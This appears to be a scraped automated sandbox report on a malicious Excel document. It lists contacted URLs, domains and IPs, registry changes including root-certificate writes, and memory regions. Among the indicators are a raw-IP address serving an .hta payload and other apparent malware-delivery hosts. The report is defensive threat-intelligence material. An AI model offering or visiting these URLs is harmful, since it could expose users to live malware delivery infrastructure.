http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta24
|
unknown
|
||
|
https://linkjago.me/H
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl0
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
http://go.cr
|
unknown
|
||
|
https://linkjago.me/L
|
unknown
|
There are 37 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip.1016.filemail.com
|
142.215.209.77
|
|
|
|
1016.filemail.com
|
unknown
|
|
|
|
linkjago.me
|
188.114.96.6
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.215.209.77
|
ip.1016.filemail.com
|
Canada
|
|
|
|
146.70.113.200
|
unknown
|
United Kingdom
|
|
|
|
188.114.96.6
|
linkjago.me
|
European Union
|
||
|
188.114.97.6
|
unknown
|
European Union
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
%k/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
2060
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1036
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28AD2
|
28AD2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
q/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32A5B
|
32A5B
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32DE3
|
32DE3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33B0D
|
33B0D
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32DE3
|
32DE3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 80 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
180000
|
direct allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
420000
|
trusted library allocation
|
page read and write
|
||
|
374000
|
heap
|
page read and write
|
||
|
27DB000
|
trusted library allocation
|
page read and write
|
||
|
1DEF000
|
stack
|
page read and write
|
||
|
431000
|
heap
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
1E7F000
|
stack
|
page read and write
|
||
|
3959000
|
heap
|
page read and write
|
||
|
583000
|
heap
|
page read and write
|
||
|
46D000
|
heap
|
page read and write
|
||
|
1D90000
|
heap
|
page read and write
|
||
|
3D2000
|
heap
|
page read and write
|
||
|
1B1F0000
|
heap
|
page read and write
|
||
|
39D3000
|
heap
|
page read and write
|
||
|
49CB000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
33C0000
|
trusted library allocation
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
4773000
|
heap
|
page read and write
|
||
|
3912000
|
heap
|
page read and write
|
||
|
453B000
|
heap
|
page read and write
|
||
|
7FE898B4000
|
trusted library allocation
|
page read and write
|
||
|
16F000
|
trusted library allocation
|
page read and write
|
||
|
3544000
|
trusted library allocation
|
page read and write
|
||
|
2A7000
|
heap
|
page read and write
|
||
|
B52000
|
direct allocation
|
page execute and read and write
|
||
|
45F6000
|
heap
|
page read and write
|
||
|
27E4000
|
trusted library allocation
|
page read and write
|
||
|
57D5000
|
heap
|
page read and write
|
||
|
1B27E000
|
stack
|
page read and write
|
||
|
59D9000
|
heap
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A18000
|
heap
|
page read and write
|
||
|
3715000
|
trusted library allocation
|
page read and write
|
||
|
239000
|
heap
|
page read and write
|
||
|
1D54000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
28F5000
|
trusted library allocation
|
page read and write
|
||
|
1C30000
|
heap
|
page read and write
|
||
|
591C000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
39EB000
|
heap
|
page read and write
|
||
|
47F0000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
5967000
|
heap
|
page read and write
|
||
|
5834000
|
heap
|
page read and write
|
||
|
4600000
|
heap
|
page read and write
|
||
|
416000
|
heap
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
475000
|
heap
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
2BE000
|
heap
|
page read and write
|
||
|
39D0000
|
heap
|
page read and write
|
||
|
4EF000
|
heap
|
page read and write
|
||
|
49A8000
|
heap
|
page read and write
|
||
|
49C1000
|
heap
|
page read and write
|
||
|
2BB9000
|
trusted library allocation
|
page read and write
|
||
|
4605000
|
heap
|
page read and write
|
||
|
47DF000
|
heap
|
page read and write
|
||
|
24B000
|
heap
|
page read and write
|
||
|
7FE898CB000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
39D7000
|
heap
|
page read and write
|
||
|
5724000
|
heap
|
page read and write
|
||
|
4994000
|
heap
|
page read and write
|
||
|
5777000
|
heap
|
page read and write
|
||
|
1A4EE000
|
heap
|
page execute and read and write
|
||
|
1CB0000
|
heap
|
page read and write
|
||
|
59C3000
|
heap
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
3C3000
|
heap
|
page read and write
|
||
|
482000
|
heap
|
page read and write
|
||
|
3CE6000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
3B6000
|
heap
|
page read and write
|
||
|
1D70000
|
direct allocation
|
page read and write
|
||
|
260000
|
heap
|
page read and write
|
||
|
23EE000
|
trusted library allocation
|
page read and write
|
||
|
27A000
|
heap
|
page read and write
|
||
|
573C000
|
heap
|
page read and write
|
||
|
3973000
|
heap
|
page read and write
|
||
|
49A2000
|
heap
|
page read and write
|
||
|
21E1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
59DD000
|
heap
|
page read and write
|
||
|
3D0E000
|
heap
|
page read and write
|
||
|
36E000
|
heap
|
page read and write
|
||
|
1AF55000
|
heap
|
page read and write
|
||
|
3C8000
|
heap
|
page read and write
|
||
|
3B8000
|
stack
|
page read and write
|
||
|
5718000
|
heap
|
page read and write
|
||
|
3C6000
|
heap
|
page read and write
|
||
|
7FE89A33000
|
trusted library allocation
|
page read and write
|
||
|
3849000
|
heap
|
page read and write
|
||
|
5494000
|
heap
|
page read and write
|
||
|
36D000
|
heap
|
page read and write
|
||
|
4600000
|
heap
|
page read and write
|
||
|
45F4000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
384000
|
heap
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
5080000
|
trusted library allocation
|
page read and write
|
||
|
3E05000
|
heap
|
page read and write
|
||
|
31E0000
|
trusted library allocation
|
page read and write
|
||
|
39DA000
|
heap
|
page read and write
|
||
|
4B2000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1FC7000
|
direct allocation
|
page read and write
|
||
|
1B1F9000
|
heap
|
page read and write
|
||
|
39DD000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
4D81000
|
trusted library allocation
|
page read and write
|
||
|
1A4B0000
|
heap
|
page execute and read and write
|
||
|
38E000
|
heap
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
3961000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
386000
|
heap
|
page read and write
|
||
|
3C53000
|
heap
|
page read and write
|
||
|
47F0000
|
heap
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E8000
|
heap
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
150000
|
trusted library allocation
|
page read and write
|
||
|
123C1000
|
trusted library allocation
|
page read and write
|
||
|
47F0000
|
heap
|
page read and write
|
||
|
1A5CC000
|
stack
|
page read and write
|
||
|
39E5000
|
heap
|
page read and write
|
||
|
550B000
|
heap
|
page read and write
|
||
|
4607000
|
heap
|
page read and write
|
||
|
5E9000
|
heap
|
page read and write
|
||
|
3AD000
|
heap
|
page read and write
|
||
|
4AE000
|
heap
|
page read and write
|
||
|
3179000
|
trusted library allocation
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
152000
|
unkown
|
page read and write
|
||
|
2495000
|
trusted library allocation
|
page read and write
|
||
|
5A1D000
|
heap
|
page read and write
|
||
|
3975000
|
heap
|
page read and write
|
||
|
49C9000
|
heap
|
page read and write
|
||
|
123A1000
|
trusted library allocation
|
page read and write
|
||
|
296000
|
heap
|
page read and write
|
||
|
39D7000
|
heap
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
3E00000
|
heap
|
page read and write
|
||
|
1C570000
|
heap
|
page read and write
|
||
|
59CE000
|
heap
|
page read and write
|
||
|
49F000
|
heap
|
page read and write
|
||
|
49C9000
|
heap
|
page read and write
|
||
|
3C10000
|
heap
|
page read and write
|
||
|
34C0000
|
trusted library allocation
|
page read and write
|
||
|
29BB000
|
heap
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
3290000
|
trusted library allocation
|
page read and write
|
||
|
3D0E000
|
heap
|
page read and write
|
||
|
7FE898C3000
|
trusted library allocation
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
7FE89890000
|
trusted library allocation
|
page read and write
|
||
|
5320000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
234000
|
heap
|
page read and write
|
||
|
49A4000
|
heap
|
page read and write
|
||
|
3988000
|
heap
|
page read and write
|
||
|
39D9000
|
heap
|
page read and write
|
||
|
5A0B000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
7FE8996C000
|
trusted library allocation
|
page execute and read and write
|
||
|
445D000
|
heap
|
page read and write
|
||
|
45D7000
|
heap
|
page read and write
|
||
|
39ED000
|
heap
|
page read and write
|
||
|
1C251000
|
heap
|
page read and write
|
||
|
2BC2000
|
trusted library allocation
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
28F8000
|
trusted library allocation
|
page read and write
|
||
|
1BC6000
|
heap
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
1AAF0000
|
heap
|
page read and write
|
||
|
1D50000
|
heap
|
page read and write
|
||
|
1C295000
|
heap
|
page read and write
|
||
|
246000
|
heap
|
page read and write
|
||
|
374000
|
heap
|
page read and write
|
||
|
1D94000
|
heap
|
page read and write
|
||
|
260000
|
heap
|
page read and write
|
||
|
3CE7000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
5843000
|
heap
|
page read and write
|
||
|
7FE89A84000
|
trusted library allocation
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
1F60000
|
direct allocation
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BB1000
|
trusted library allocation
|
page read and write
|
||
|
59C6000
|
heap
|
page read and write
|
||
|
3909000
|
heap
|
page read and write
|
||
|
3CB0000
|
heap
|
page read and write
|
||
|
41A0000
|
trusted library allocation
|
page read and write
|
||
|
37D000
|
heap
|
page read and write
|
||
|
49D3000
|
heap
|
page read and write
|
||
|
7FE89A63000
|
trusted library allocation
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
45D7000
|
heap
|
page read and write
|
||
|
4721000
|
heap
|
page read and write
|
||
|
2A5000
|
stack
|
page read and write
|
||
|
2E57000
|
trusted library allocation
|
page read and write
|
||
|
1C3BC000
|
heap
|
page read and write
|
||
|
9CB1000
|
trusted library allocation
|
page read and write
|
||
|
356000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
3AF000
|
heap
|
page read and write
|
||
|
358000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
3410000
|
trusted library allocation
|
page execute
|
||
|
1FA000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
39CF000
|
heap
|
page read and write
|
||
|
229E000
|
stack
|
page read and write | page guard
|
||
|
56C0000
|
heap
|
page read and write
|
||
|
384C000
|
heap
|
page read and write
|
||
|
3870000
|
heap
|
page read and write
|
||
|
302B000
|
stack
|
page read and write
|
||
|
3C6000
|
heap
|
page read and write
|
||
|
3760000
|
trusted library allocation
|
page read and write
|
||
|
49FD000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
44B6000
|
heap
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
B54000
|
direct allocation
|
page execute and read and write
|
||
|
518000
|
heap
|
page read and write
|
||
|
474F000
|
heap
|
page read and write
|
||
|
47A000
|
heap
|
page read and write
|
||
|
49B000
|
heap
|
page read and write
|
||
|
1C1CE000
|
stack
|
page read and write
|
||
|
20FF000
|
stack
|
page read and write
|
||
|
3179000
|
trusted library allocation
|
page read and write
|
||
|
49A1000
|
heap
|
page read and write
|
||
|
297000
|
heap
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
49CC000
|
heap
|
page read and write
|
||
|
4741000
|
heap
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
1A7C1000
|
heap
|
page read and write
|
||
|
359000
|
heap
|
page read and write
|
||
|
1D50000
|
direct allocation
|
page read and write
|
||
|
33EE000
|
stack
|
page read and write
|
||
|
4795000
|
heap
|
page read and write
|
||
|
5A16000
|
heap
|
page read and write
|
||
|
408000
|
heap
|
page read and write
|
||
|
1A749000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
443000
|
heap
|
page read and write
|
||
|
1C28C000
|
stack
|
page read and write
|
||
|
519000
|
heap
|
page read and write
|
||
|
290F000
|
trusted library allocation
|
page read and write
|
||
|
3C1C000
|
heap
|
page read and write
|
||
|
5863000
|
heap
|
page read and write
|
||
|
35F0000
|
trusted library allocation
|
page read and write
|
||
|
1A47B000
|
stack
|
page read and write
|
||
|
4721000
|
heap
|
page read and write
|
||
|
39EB000
|
heap
|
page read and write
|
||
|
1C58F000
|
stack
|
page read and write
|
||
|
59C8000
|
heap
|
page read and write
|
||
|
1FC0000
|
direct allocation
|
page read and write
|
||
|
47E000
|
heap
|
page read and write
|
||
|
59E2000
|
heap
|
page read and write
|
||
|
1DED000
|
stack
|
page read and write
|
||
|
5697000
|
heap
|
page read and write
|
||
|
5845000
|
heap
|
page read and write
|
||
|
57F9000
|
heap
|
page read and write
|
||
|
7FE89897000
|
trusted library allocation
|
page read and write
|
||
|
24C000
|
stack
|
page read and write
|
||
|
2F8000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
1C76000
|
heap
|
page read and write
|
||
|
47F0000
|
heap
|
page read and write
|
||
|
491000
|
heap
|
page read and write
|
||
|
312F000
|
trusted library allocation
|
page read and write
|
||
|
383B000
|
heap
|
page read and write
|
||
|
1C1EA000
|
heap
|
page read and write
|
||
|
3CE9000
|
heap
|
page read and write
|
||
|
3987000
|
heap
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3CD8000
|
heap
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
3760000
|
trusted library allocation
|
page read and write
|
||
|
3987000
|
heap
|
page read and write
|
||
|
7FE89C60000
|
trusted library allocation
|
page read and write
|
||
|
1A60A000
|
stack
|
page read and write
|
||
|
37E000
|
heap
|
page read and write
|
||
|
1AAE0000
|
heap
|
page read and write
|
||
|
541F000
|
heap
|
page read and write
|
||
|
389000
|
heap
|
page read and write
|
||
|
335000
|
heap
|
page read and write
|
||
|
4E0000
|
direct allocation
|
page read and write
|
||
|
5A16000
|
heap
|
page read and write
|
||
|
7FFFFF87000
|
trusted library allocation
|
page execute read
|
||
|
46A000
|
heap
|
page read and write
|
||
|
398C000
|
heap
|
page read and write
|
||
|
7FE89A20000
|
trusted library allocation
|
page read and write
|
||
|
5A1A000
|
heap
|
page read and write
|
||
|
28F8000
|
trusted library allocation
|
page read and write
|
||
|
215000
|
heap
|
page read and write
|
||
|
1C435000
|
heap
|
page read and write
|
||
|
3AC000
|
heap
|
page read and write
|
||
|
1A830000
|
heap
|
page execute and read and write
|
||
|
49BE000
|
heap
|
page read and write
|
||
|
1A86E000
|
heap
|
page execute and read and write
|
||
|
3985000
|
heap
|
page read and write
|
||
|
4574000
|
heap
|
page read and write
|
||
|
2310000
|
heap
|
page execute and read and write
|
||
|
1B5EC000
|
stack
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
1C224000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
584D000
|
heap
|
page read and write
|
||
|
28B000
|
heap
|
page read and write
|
||
|
27D7000
|
trusted library allocation
|
page read and write
|
||
|
5F7000
|
heap
|
page read and write
|
||
|
25F000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
2AA0000
|
remote allocation
|
page read and write
|
||
|
28C000
|
heap
|
page read and write
|
||
|
1C44E000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
26F0000
|
heap
|
page read and write
|
||
|
3CD000
|
heap
|
page read and write
|
||
|
1AB8F000
|
stack
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
35F0000
|
trusted library allocation
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
1FB0000
|
direct allocation
|
page read and write
|
||
|
3C48000
|
heap
|
page read and write
|
||
|
435000
|
heap
|
page read and write
|
||
|
395C000
|
heap
|
page read and write
|
||
|
3A0000
|
direct allocation
|
page read and write
|
||
|
59DD000
|
heap
|
page read and write
|
||
|
1B1BB000
|
stack
|
page read and write
|
||
|
294F000
|
trusted library allocation
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
7FE8990C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B54E000
|
stack
|
page read and write
|
||
|
190000
|
heap
|
page read and write
|
||
|
39EB000
|
heap
|
page read and write
|
||
|
44AC000
|
heap
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
27E2000
|
trusted library allocation
|
page read and write
|
||
|
2905000
|
trusted library allocation
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
1A4000
|
heap
|
page read and write
|
||
|
22C2000
|
trusted library allocation
|
page read and write
|
||
|
3C6A000
|
heap
|
page read and write
|
||
|
39D8000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
382000
|
heap
